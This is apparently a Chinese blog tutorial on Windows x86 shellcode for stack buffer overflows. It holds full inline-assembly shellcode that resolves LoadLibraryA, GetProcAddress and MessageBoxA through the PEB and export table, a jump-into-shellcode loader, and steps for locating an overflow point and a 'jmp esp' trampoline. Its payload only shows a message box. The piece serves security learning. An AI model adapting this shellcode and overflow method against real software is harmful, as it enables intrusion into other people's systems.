【逆向】软件漏洞shellcode

最新推荐文章于 2024-05-20 20:42:03 发布
最新推荐文章于 2024-05-20 20:42:03 发布
阅读量282 收藏
点赞数
分类专栏: reverse逆向分析 文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dajian1040556534/article/details/130934374
版权

文章目录

简单shellcode

简单shellcode存在的问题

  1. 利用xdbg工具查找的栈中shellcode起始地址,用该地址淹没返回地址,这个地址会经常发生变化,须找到一个能动态定位到shellcode起始地址的办法。

    解决方法:因为执行完ret后,除了eip的值被修改了,esp的值此时能刚好存放shellcode的起始位置。因此只需要从系统调用的dll文件中找到jmp esp这条语句(一般格式为0x7xxxxxxx),将这条语句的位置放到返回地址,就能够以它为跳板转移到shellcode执行位置。因为jmp esp这条语句是系统调用的dll文件中的语句,因此不会轻易改变。

  2. shellcode中存在0x00导致shellcode被截断

    解决方法:因为shellcode的注入方法都是通过程序输入字符串的位置进行注入,因此如果shellcode中出现了0x00,就会导致shellcode提前被截断,这样就无法直行shellcode原本的功能。

    1. 可以使用xor edi,edi; push edi; 用edi来替换原本shellcode中出现的0x00,避免shellcode出现0x00

  3. 程序执行完shellcode后,不能正常退出。

    解决方法:从系统调用的dll文件中找到ExitProcess函数的位置,在shellcode后面加上

    mov eax, 0x7xxxxxxx; //ExitProcess
push 0;
call eax;

  4. 一些常用的函数的地址被写死了,例如MessageBox、ExitProcess函数

    解决方法:TEB、PEB从kernel32.dll文件中找到这些函数

优化shellcode

#include<windows.h>
#include<iostream>

void _declspec(naked)shellCode() {
	_asm {
		// 1. 保存想要找的函数名的字符串
		/*
		LoadLibraryA:	4C 6F 61 64 4C 69 62 72 61 72 79 41 00        长度:0xD
		GetProcAddress:47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00  长度:0xF
		user32.dll:	75 73 65 72 33 32 2E 64 6C 6C 00			  长度:0xB
		MeesageBoxA:	4D 65 73 73 61 67 65 42 6F 78 41 00			  长度:0xC
		hello 51hook:	68 65 6C 6C 6F 20 35 31 68 6F 6F 6B 00		  长度:0xD
		*/
		pushad
		sub esp, 0x30 // 开辟一段栈空间,增加健壮性
		// hello 51hook
		mov byte ptr ds : [esp - 1] , 0x0 // 因为最后多出了一个0x00,如果简单使用push的话,会造成内存的浪费,因此可以使用mov来进行单字节压栈
		sub esp, 0x1
		push 0x6B6F6F68
		push 0x3135206F
		push 0x6c6c6568
		// MessageBoxA
		push 0x41786f
		push 0x42656761
		push 0x7373654d
		// user32.dll
		mov byte ptr ds : [esp - 1] , 0x0
		sub esp, 0x1
		mov ax, 0x6c6c
		mov word ptr ds : [esp - 2] , ax
		sub esp, 0x2
		push 0x642e3233
		push 0x72657375
		// GetProcAddress
		mov byte ptr ds : [esp - 1] , 0x0
		sub esp, 0x1
		mov ax, 0x7373
		mov word ptr ds : [esp - 2] , ax
		sub esp, 0x2
		push 0x65726464
		push 0x41636f72
		push 0x50746547
		// LoadLibraryA
		mov byte ptr ds : [esp - 1] , 0x0
		sub esp, 0x1
		push 0x41797261
		push 0x7262694c
		push 0x64616f4c
		mov ecx, esp
		push ecx
		call fun_payload


		// 2.通过FS寄存器获取kernel32.dll的基址
	fun_GetModule:
		push ebp
		mov ebp, esp
		sub esp, 0xc
		push ecx

		mov esi, dword ptr fs : [0x30]//PEB地址
		mov esi, [esi + 0xc]//LDR结构体地址
		mov esi, [esi + 0x1c]//list
		mov esi, [esi]//第二项 kernel32.dll或者kernelbase.dll的信息
		mov eax, [esi + 0x8]//kernel32.dll的dllbase(该PE文件的基址)

		pop ecx
		mov esp, ebp
		pop ebp
		retn

		//3.获得导出表,根据导出表查找需要的函数
	fun_GetProcAddr: //该函数包含三个参数(imageBase,funName,strlen)
		push ebp
		mov ebp, esp
		sub esp, 0x10
		push esi
		push edi
		push edx
		push ebx
		push ecx
		
		mov edx, [ebp+0x8] //dllbase //第一个参数
		mov esi, [edx+0x3c] //lf_anew
		lea esi, [esi+edx] //NT头/PE头
		mov esi, [esi+0x78] //导出表的RVA
		lea esi, [edx+esi] //导出表的VA
		mov edi, [esi + 0x1c]//EAT rva
		lea edi, [edx + edi]//EAT va
		mov[ebp - 0x4], edi // 将EAT VA存放到局部变量1中
		mov edi, [esi + 0x20]//ENT rva
		lea edi, [edx + edi]//ENT va
		mov[ebp - 0x8], edi // 将ENT VA存放到局部变量2中
		mov edi, [esi + 0x24]//EOT rva
		lea edi, [edx + edi]//EOT va
		mov[ebp - 0xc], edi// 将EOT VA存放到局部变量3中


		//查找api  esi存放导出表的ENT, edi存放需要查找的函数字符串
		xor eax, eax
		cld //DF清零,这样就会使得repe cmpsb这条指令逐个向后比较两个字符串的每个字符
		jmp tag_begincmp
	tag_cmpLoop :
		inc eax//eax++
	tag_begincmp :
		mov esi, [ebp - 0x8]//函数名称表ENT
		mov esi, [esi + eax * 4]//第一个名称,但这是RVA
		mov edx, [ebp + 0x8]//dllbase
		lea esi, [edx + esi]//函数名称 VA
		mov edi, [ebp + 0xc]//第二个参数 要找的函数名称地址
		mov ecx, [ebp + 0x10]//字符串长度
		repe cmpsb
		jne tag_cmpLoop

		//如果相等的话,eax是数组索引
		mov esi, [ebp - 0xc] //EOT
		xor edi, edi
		mov di, [esi + eax * 2]//word 类型,找到EOT上对应索引的值,该值等于EAT上对应字符串的索引
		mov ebx, [ebp - 0x4]//EAT
		mov ebx, [ebx + edi * 4]//api addr rva
		mov edx, [ebp + 0x8]//dllbase
		lea eax, [edx + ebx]//addr,找到了对应的函数的地址


		pop ecx
		pop ebx
		pop edx
		pop edi
		pop esi
		mov esp, ebp
		pop ebp
		retn 0xc


		

	fun_payload:
		push ebp
		mov ebp, esp
		sub esp, 0x20
		push ecx
		push edx
		push esi
		push edi

		// DLLBASE
		call fun_GetModule
		mov[ebp - 0x4], eax // dllbase,保存为第一个局部变量
		//获取LoadLiabraryA
		push 0xD
		mov ecx, [ebp + 0x8]//第一个参数,就是之前保存的许多字符串中的LoadLiabraryA字符串
		push ecx
		push eax
		call fun_GetProcAddr
		mov[ebp - 0x8], eax//LoadLibraryA,保存为第二个局部变量

		//获取GetProcessAddr
		push 0xF
		mov ecx, [ebp + 0x8]//第一个参数
		lea ecx, [ecx + 0xd]
		push ecx
		mov edx, [ebp - 0x4]
		push edx
		call fun_getProcAddr
		mov[ebp - 0xc], eax//GetProcessAddr,保存为第三个局部变量

		//调用LoadLibraryA加载user32.dll
		mov ecx, [ebp + 0x8]//第一个参数,就是之前保存的许多字符串中的LoadLiabraryA字符串
		lea ecx, [ecx + 0x1c] // 之前保存的许多字符串中的user32.dll字符串
		push ecx //将user32.dll字符串作为参数传入
		call[ebp - 0x8]//调用LoadLibraryA函数
		mov[ebp - 0x10], eax //user32.dllbase 

		// 调用GetProcessAddr来获取MessageBoxA的地址
		mov ecx, [ebp + 0x8]
		lea ecx, [ecx + 0x27] // 之前保存的许多字符串中的MessageBoxA字符串
		push ecx
		push[ebp - 0x10]
		call[ebp - 0xc] // GetProcessAddr(user32.dllbase, MessageBoxA),结果存放在了eax中

		// pyaload核心部分
		push 0 // 传第四个参数
		push 0 // 传第三个参数
		mov ebx, [ebp + 0x8]
		lea ebx, [ebx + 0x33] // hello 51hook字符串
		push ebx //传第二个参数
		push 0 //传第一个参数
		call eax // 调用MessageBoxA

		pop edi
		pop esi
		pop edx
		pop ecx
		mov esp, ebp
		pop ebp
		retn 0x4

	}
}

int main() {
	printf("hello qinjian");
	shellCode();
	return 0;
}

shellcode调试

#include<windows.h>
#include<iostream>
char shellcode[] = "xxx"
int main()
{
	printf("51hook");
	_asm
	{
		lea eax, shellcode
		push eax
		retn
	}
	return 0;
}

然后用xdbg来调试一下,就可以单步执行shellcode了

寻找溢出点位置的方法

  1. 输入一段很长的字符串,例如111111111111111111111111111111111111111111111111111111111111111111111111111111111111…,看程序是否崩溃
  2. 如果崩溃了,就去查看电脑->管理->windows日志->找最近的报错->错误偏移量
  3. 如果错误偏移量显示0x31313131,那么证明有溢出漏洞
  4. 然后可以尝试使用一些不重复的字符串,找到溢出点的具体位置,用jmp esp指令的位置替代
  5. 然后将溢出点后面的字符串用shellcode替换掉即可

问题:shellcode使用很多字符串的话会占用大量的栈空间,比如上述代码中就使用了LoadLibraryA、GetProcAddress、user32.dll、MeesageBoxA、hello 51hook这么多字符串。所以需要瘦身

shellcode瘦身

一般使用hash函数对用到的字符串(例如LoadLibraryA、GetProcAddress、user32.dll、MeesageBoxA、hello 51hook)进行压缩。

过动猿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基本shellcode提取方法
沉寂的孤城
10-04 5258
转载请注明出处:http://blog.csdn.net/wangxiaolong_china   这里,我们将编写一个非常简单的shellcode,它的功能是得到一个命令行。我们将从该shellcode的C程序源码开始,逐步构造并提取shellcode。 该shellcode的C程序源码为: root@linux:~/pentest# cat shellcode.c #inclu
了解黑客的关键工具Shellcode
10-29
对于初期接触网络安全的人来说,Shellcode是很神秘的东西,对于网络攻击过程中的嗅探信息、漏洞剖析都是可以理解的,但真正利用漏洞**时,通过把一段二进制码送入后并执行,就可以获得目标机器的控制权,之后的事情...
Immunity Debugger 是一款逆向工程调试器,Mona.py 是一个 Windows 平台上的漏洞利用开发辅助工具
01-13
Immunity Debugger 是一款功能强大、灵活可扩展的逆向工程调试器,它在二进制文件分析、漏洞利用和恶意软件分析等方面具有广泛的应用价值。 Mona.py 是一个 Windows 平台上的漏洞利用开发辅助工具,它可以自动化执行许多常见的漏洞利用任务,例如寻找漏洞、生成 shellcode、构造 payload 等。Mona.py 还提供了一些实用的功能,例如模块信息收集、SEH 链分析、ROP 链生成等,帮助渗透测试人员和安全研究人员更加高效地进行漏洞利用开发和攻击测试。
Windows 10_X64环境shellcode编写
Anansi的博客
11-20 2022
环境 windows 10_x64 windbg_x64 x64dbg nasm 适用于 VS 2017 的 x64 本机工具命令提示(安装visual studio会自带) redasm shellcode shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言/汇编编写。 可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。 虽然现在的操
一篇文章彻底清楚shellcode(精品)
weixin_51055545的博客
03-08 8875
shellcode 类题目 文章目录shellcode 类题目1.没开沙箱(此时我们可以系统调用get shell)picoctf_2018_shellcodemrctf2020_shellcode2.开启沙箱(orw读flag)gwctf_2019_shellcode 1.没开沙箱(此时我们可以系统调用get shell) (一)32位程序系统调用 32位程序有别于64位程序,32位通过栈传参,我们常用的寄存器有4个数据寄存器(eax,ebx,ecx,edx),2个变址寄存器(esi,edi),2个指针寄
栈溢出脚本_从shellcode学习到缓冲区溢出实战
weixin_39625098的博客
10-21 399
本文为看雪论坛优秀文章看雪论坛作者ID:techliu目录一、shellcode1.1 简介1.2 缓冲区溢出 溢出示例 规划缓冲区1.3 字符串转16进制脚本1.4 几种技巧 跳板技术 抬高栈顶保护shellcode二、windbg配置mona2.1 参考2.2 配置符号路径2.3 安装python2.4 配置windbg2.5 常用mona命令显示载入的模块 查找机器码2.6 在I...
X64-对齐和栈帧分析
qq_41490873的博客
09-29 871
为了程序稳定性,自己在分配栈空间时尽量对齐0x10 例如: sub esp,0x30 可以看出即使我在test里面调用了一个没有参数的函数test1。栈也提升了0x20 下面是函数的堆栈图
Windows安全机制---异常处理保护:Safe机制
每昔的博客
10-09 1522
文章目录Windows安全机制异常处理保护:SafeSEH原理绕过攻击返回地址利用虚函数绕过从堆中绕过利用未启用SafeSEH模块绕过SafeSEH利用加载模块之外的地址绕过利用ActiveX控件绕过SafeSEH Windows安全机制 微软关于内存保护机制 GS编译技术 SEH的安全校验机制 Heap Cookie,Safe Unlinking等一系列堆安全机制 DEP数据执行保护 ASLR...
网络攻防技术—shellcode编写实验
wion03的博客
10-18 1277
shellcode广泛用于许多涉及代码注入的攻击中。编写shellcode是相当有挑战性的。虽然我们可以很容易地从互联网上找到现有的shellcode,但是能够从头开始编写我们自己的shellcode总是令人兴奋的。shellcode中涉及到几种有趣的技术。本实验的目的是帮助学生理解这些技术,以便他们能够编写自己的shellcode。编写shellcode有几个挑战,一个是确保二进制文件中没有0x00,另一个是找出命令中使用的数据的地址。第一个挑战不是很难解决,有几种方法可以解决它。
Android逆向学习(番外一)smali2java部分文件无法反编译的bug与修复方法
qq_52380836的博客
09-05 2106
我在对一些带有$$文件名的smali文件进行逆向会出现这种情况的bug这就很奇怪了,$$文件是因为使用java lambda表达式产生的一个smali代码,虽然这种代码一般非常简单,不需要逆向直接看smali代码就可以,但是作为一名有着大志向的菜狗,我最看不得电脑报错了,所以就打算直接修复这个bug下面我们就开始分析这个bug是怎么产生的以及如何修复这个东西,通过查看报错我们发现是一行命令没有正确的运行,我们直接在命令行运行一下这个命令,发现报错如下。
逆向基础-shellCode
AppWhite_Star的博客
07-30 448
逆向基础-shellcode
2017年恶意代码威胁回顾和快速分析实践.pdf
08-08
2017年供应链攻击,勒索事件和Office漏洞层出不穷,恶意代码的复杂性也在不断进化。我们下面将分享一些在我们日常工作中针对不同类型样本自动化分析的一些方法和例子。我们会结合过去一年中的重点事件讲述这些技巧的...
CyberQueens:Cyber​​Queens课程材料-有抱负的逆向工程师,漏洞利用开发人员和黑客的学习资源和练习
05-23
逆向工程与漏洞研究相结合:堆栈溢出练习调试堆栈溢出和其他漏洞堆栈溢出漏洞利用开发动手实践堆栈溢出项目(第1部分) 动手实践堆栈溢出项目(第2部分) 动手进行现实世界堆栈溢出项目-编写Shellcode(第3部分)...
qHooK:qHooK 是一个非常简单的 Python 脚本(依赖于 pydbg),它在任何进程中挂钩用户定义的 Win32 API,然后在进程运行时进行监控,最后准备一个包含各种有趣信息的 CSV 报告,这可以帮助逆向工程师追踪分析未知的漏洞利用样本外壳代码
06-27
python 脚本(依赖于 pydbg),它在任何进程中挂钩用户定义的 Win32 API,然后在进程运行时进行监控,最后准备一个包含各种有趣信息的 CSV 报告,这可以帮助逆向工程师追踪/分析未知的漏洞利用样本/shellcode。...
栈溢出shellcode字符串push
weixin_30532987的博客
07-31 127
这是很久以前的笔记了 去年的笔记··········· 这里增加几条: 1) PUSH 字符串, 先用其他字符代表0x00 然后 通过 EBP的负偏离量处一字节一字节的写入!!!!!!!!!! 重新产生没有 NULL字节的 机器码 2) XOR/add /sub 计算 比如 0x006e616c 那么 0x77191693 xor 0x777777ff =0x006...
Shellcode 开发关键技术
AlexYoung28的博客
10-15 1279
1. 位置代码无关性技术 定义:位置无关代码(PIC)是指不适用硬编码地址来寻址指令或数据的代码。 必要性:因为Shellcode被加载到内存地址执行时,指令的内存地址是不确定的。 2.如何获取Shellcode起始位置 Shellcode在以位置无关方式访问时,首先需要引用一个 基址指针,用该基址指针加上或减去一定的偏移,从而顺利 的访问shellcode中包含的数据。  Shel...
Heap Spray原理浅析
热门推荐
magictong的专栏
03-24 3万+
Heap Spray原理浅析 Magictong 2012/03   摘要:本文主要介绍Heap Spray的基本原理和特点、以及防范技术。 关键词:Heap Spray、溢出攻击、漏洞利用、堆溢出   Heap Spray定义基本描述 Heap Spray并没有一个官方的正式定义,毕竟这是漏洞攻击技术的一部分。但是我们可以根据它的特点自己来简单总结一下。Heap Spray是在sh
浅入浅出Liunx Shellcode
weixin_34033624的博客
05-15 205
/*————————————-Author:旋木木[[email][email protected][/email]]Date:2008/05/12Website:[url]www.bugshower.org[/url]————————————–*/ 一:什么是shellcode话说某天某爱国***编译了一个Nday溢出利用程序来***CNN,输入IP并且enter之后发现...
Linux网络编程:网络基础
最新发布
weixin_73234157的博客
05-20 493
当我们形成计算机网络后,小明要给他的暗恋对象小红发一句“我喜欢你”,结果发给了小芳……,在计算机网络中会出现许许多多的主机,当我们进行网络通信时,我们要通过协议来找到指定的接收方。同理在单台主机中,数据从键盘中读入再转载到当前网卡也是需要协议的。简单来说:协议就是一种约定当计算机在读取数据时,发现数据中存在向网卡输送的标志(协议)时,就往网卡输送。当网卡读取到输送给小红,网卡就不会发送给小芳。
shellcode downloader
01-08
Shellcode downloader(壳代码下载器)是一种恶意软件的一部分,用于在受感染的系统上下载和执行恶意shellcode。它通常由黑客或攻击者利用系统的弱点,如漏洞或错误配置,将其注入到受感染系统的进程中。 Shellcode...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值